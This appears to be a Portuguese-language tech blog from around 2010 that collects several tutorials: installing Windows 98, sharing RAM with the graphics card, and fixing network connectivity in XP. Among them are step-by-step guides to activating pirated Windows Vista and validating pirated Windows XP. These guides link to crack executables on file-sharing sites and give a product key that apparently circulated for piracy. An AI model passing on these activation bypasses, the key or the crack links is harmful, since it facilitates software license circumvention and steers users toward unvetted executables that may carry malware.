    VIA AC 97 AC - Audio Driver: http://www.viaarena.com/Driver/vinyl_v700b.zip

    Drivers Realtek High Definition: Windows 7, Vista e XP: http://www.kerodownload.com/s-fx_info-id-31104.html
    Acho que muitos usuários do win98 querem formata-los mas não sabem como então vou explicar como formatar e instalar o win98 IMPORTANTE QUANDO FORMATAR SEU WINDOWS TENHA TODOS OS DRIVERS DO SEU PC E FIQUE CIENTE QUE IRÁ PERDER TODOS OS DADOS DE SEU COMPUTADOR 1° Tenha em mãos um disco de boot se você não possuir um entre em meu computador > painel de controle > entre na orelha disco de inicializaçao insira um disquete na maquina e faça o disco com a opção que tem nessa mesma janela 2°reinicie seu pc segurando delete para entrar na Bios/setup, já estando na bios entre em na segunda opção de cima para baixo, coloque o 1/ boot como floopy (ou algo assim), e o segundo como ide-0, de esc e aperte f10 para salvar as configurações (a maioria dos setups são desse jeito mais existe outro tipo de setup mas e quase mesma coisa).3°o seu computador ira entrar no disco de boot inicie o disco com suporte a cd-rom. 4° entrando no a: / escreva f disk para entrar no menu de partições do seu hd, selecione a 3 para excluir uma partição primaria e selecione a 1 quando quiser criar uma partição primaria. 5°selecione a 3° opção e após isso selecione a 1° e delete a partição primaria apos isso saia da opção 3 e entre na 1 e crie uma partição primaria (lendo atentamente todas as opções para não errar).apos criar a partição reinicie seu computador ainda com o disco de boot no driver de disquete.6° após isso (quando o disco de boot já estiver carregado) use o comando format c: e pronto hd formatado.INSTALANDO O WIN98 1°apos formatar o hd e o seu pc já tiver reiniciado e o disco de boot também use o comando c:\ 2° apos isso use o comando md win98 para criar a pasta aonde o win98 será instalado. 3° depois use o comando cd win98 para entrar na pasta que você criou 4° dentro da pasta use o comando copy d: \win98\*.* para iniciar a copia dos arquivos. 5°Após a cópia dos arquivos digite o comando instalar, e vamos começar a instalação. 6° essa etapa não tem erro e só fazer o que se pede que tudo seja feito automaticamente, digite a chave do programa e etc... 7° após a instalação do win98 é a hora de se instalar os drivers (softwares usados para que o sistema operacional reconhece seu hardware) se você possuir todos os drivers necessários é tudo muito simples basta entrar em meu computador > painel de controle > sistema >gerenciador de dispositivos e instalar os drivers que estão faltando.

    quinta-feira, 18 de fevereiro de 2010

    AMD ATI RADEON 5970 HD ULTRA SLI - A MONSTRA EM ACELERAMENTO

    AMD ATI RADEON 5970 HD - A PLACA GRÁFICA MAIS PODEROSA DO MERCADO



    http://avacalouca.files.wordpress.com/2009/11/ati-radeon-hd-5970.jpg


    http://www.hitechreview.com/uploads/2009/11/ATI-Radeon-HD-5970-graphics-_1.jpg

    http://www.desinformado.com/wp-content/uploads/2009/11/AMD-ATI-radeon-hd-5970-graphic-card.jpg

    [Tutorial] Overclock Placa de Video - Compartilhando RAM para Video

    Galera vou mandar esse tutorial muito importante para vocês.

    No meu caso, eu não preciso fazer overclock porque eu tenho a ATi Radeon 5970 Ultra Sli Crossfire PCIe-2.0.

    Agora para vocês,

    1- Reinicie o computador
    2- Aperte Delete e Entre no Setup CMOS/BIOS
    3- Procure uma Opção Chamada Video Share Memory (Dependendo da Versão e da Bios de vocês)
    4- Dependendo do Computador a placa de video ela terá um padrão de memória 32,64,128.
    5- Se o computador de vocês for 2,3,4 GBs dependendo do processador, vai ser o seguinte:

    2Gb - Libera no minimo entre 128 até 468 Mb's (Capaz de chegar a 512Mb's)
    3Gb - Libera no minmo entre 128 até 512 ou mais
    4Gb - Libera entre 128 até 1Gb (1024 Mb's)

    6- É só aplicar a configuração apertando F10 e coloque Y (sim)
    7- Daí vai reiniciar o computador novamente.
    8- Quando Carregar o Windows vá em Iniciar> Executar e digite: dxdiag
    9- no dxdiag --> (Diagnóstico do Direct X) Vá na guia exibir
    10- Lá vai aparecer a sua nova e modificada memória da placa de video.

    Assim os jogos rodam com mais performance como se você colocasse uma Off-Board no seu computador.

    Tutorial: ativando o Windows Vista 32/64-bits

    A Microsoft anda dizendo nos quatro cantos do mundo que o SP1 do Vista irá desativar todos os tipos de crack. Nós sabemos que isso é impossível, eles podem até bloquear os cracks atuais, mas não dou 1 dia até sair um novo para fazer a nossa festa dos piratas. Então, use as dicas abaixo sem preocupação. :D

    Pela BIOS:
    O crack em questão emula a BIOS de um computador que possui o Windows Vista de Fábrica (OEM) e isso irá validar a sua cópia do Vista pirata.
    Como usar?
    Rode o executável e deixe o programa acionar os procedimentos, depois reinicie o seu computador e o Windows Vista será ativado!
    Download do Emulador - http://w14.easy-share.com/1700845003.html
    Mais dicas de validação pela BIOS (em inglês). - http://www.mydigitallife.info/2007/03/10/vista-loader-20-oem-bios-emu-crack-softmod-update/

    OUTRAS DICAS:
    1. Instale o Vista (qualquer versão) sem inserir o serial2. Vá em Iniciar/ Todos os programas/ Acessórios e e clique com o botão direito em Prompt de Comando e selecione Executar como Administrador. Se o Controle de Conta de Usuário estiver ativado irá aparecer um alerta. Clique em Continuar.
    3. Digite “cd c:\windows\system32” (sem as aspas) e aperte Enter
    4. Digite “date” e aperte Enter
    5. Digite “31/12/2099“( sem as aspas) e aperte Enter
    6. Digite o script ”slmgr.vbs –rearm” (sem as aspas) e aperte Enter. Aguarde a mensagem de que foi concluído com sucesso. Aqui demora um pouco.
    7. Digite “date” (sem as aspas) e aperte Enter
    8. Digite a data atual e aperte Enter
    9. Saia do Prompt de Comando e não reinicie o computador
    10. Agora clique com o botão direito no arquivo “Vista test crack.exe”"Link do Vista test crack - http://www.4shared.com/file/10822568/ff807632/Vistatest.html" e selecione Executar como Administrador
    11. Clique em Install e você verá a mensagem Service Installed
    12. Feche o “Vista test crack” e reinicie o computador. Pra confirmar se o seu WinVista foi crackeado com sucesso vá em Iniciar/Executar e digite “slmgr.vbs –dlv” (sem as aspas).
    Veja se na última linha (Tempo Restante) o tempo voltou para 30 dias (43200 minutos) e clique em OK. Conte 1 minuto no relógio e novamente entre no Executar e digite “slmgr.vbs –dlv” e veja que o Tempo Restante continua em 30 dias (43200 minutos).

    Validando o Windows XP SP2 Pirata "Sem Programa!"

    Se você não consegue atualizar o Windows XP, ou está com uma notificação que o sistema operacional é falso, siga o seguinte tutorial de validação.

    1- Vá em Iniciar> Executar.

    2- Digite Regedit e clique em ok.

    3- Já dentro do regedit, navegue até a chave HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents

    4- No Painel a direita clique duas vezes em OOBETimer.

    5-Na Janela que foi aberta, apague qualquer valor e clique e de OK. Feche o Regedit.

    6- Vá novamente em Iniciar> Executar e dessa vez digite: %Systemroot\system32\oobe\msoobe.exe /a

    7- Na janela que foi aberta, escolha a opção Sim, desejo telefonar....

    8- Na Próxima etapa, clique no botão alterar chave do produto.

    9- Na Etapa seguinte, Digite a CD-KEY: THMPV-77D6F-94376-8HGKG-VRDRQ
    e clique no botão Atualizar.

    10- Após Clicar no botão Atualizar, o Assistente para ativação voltará para a janela anterior, então clique em "lembrar mais tarde" e reinicie o computador

    11- Reiniciado o Computador vá novamente em Iniciar> Executar e digite novamente: %Systemroot\system32\oobe\msoobe.exe /a

    12- Aparecerá a seguinte mensagem: Ativação do Windows
    O Windows Já Está Ativado. Clique em OK para sair

    Pronto!. Windows Validado com Sucesso!

    Tutorial: resolvendo o problema da "Conectividade Nula ou Limitada" no XP SP2 ou SP3

    Salve, galera! Andei meio sumido, mas estou de volta!

    Neste último fim de semana, meu XP deu pau e tive que formatar o HD e instalar tudo de novo (se eu não tivesse dual boot com o Windows 7 eu tava perdido!), fazer isso periodicamente é necessário, afinal, é Ruindows, mas dar problema quando você mais precisa é sacanagem…

    Eu instalei o SP3 pela primeira vez de instalação limpa e gostei, mas tava sofrendo de um probleminha que eu já tinha no SP2 e tinha resolvido, mas não lembrava: a mensagem de “Conectividade Nula ou Limitada”, um erro de conexão da placa de rede, que o XP tenta definir um IP e não consegue, e isso atravanca bastante a inicialização da máquina.

    O problema é esse da imagem:

    Mas há uma maneira de resolver de vez, e não de esconder a notificação, pois fazendo isso o problema persiste. Olha só:

    - Vá em Iniciar, Conectar, Mostrar todas as Conexões – ou Painel de Controle, Conexões de Rede;

    - Dê um clique direito no ícone de Conexão Local, e selecione Propriedades;

    - Na janela “Esta conexão usa estes itens”, desça e de um duplo clique em Protocolo TCP/IP;

    - O que você vai fazer agora é definir manualmente um IP e uma máscara para a placa, não permitindo que o Windows procure uma automaticamente. Deixe as opções exatamente como na imagem:

    Depois disso é so clicar em OK, reiniciar a máquina e constatar que a inicialização ficou bem mais rápida, pois o Windows não fica que nem um trouxa procurando IP para a placa. E pronto! Acabou o drama da mensagem chatinha e da lerdeza pra iniciar a máquina!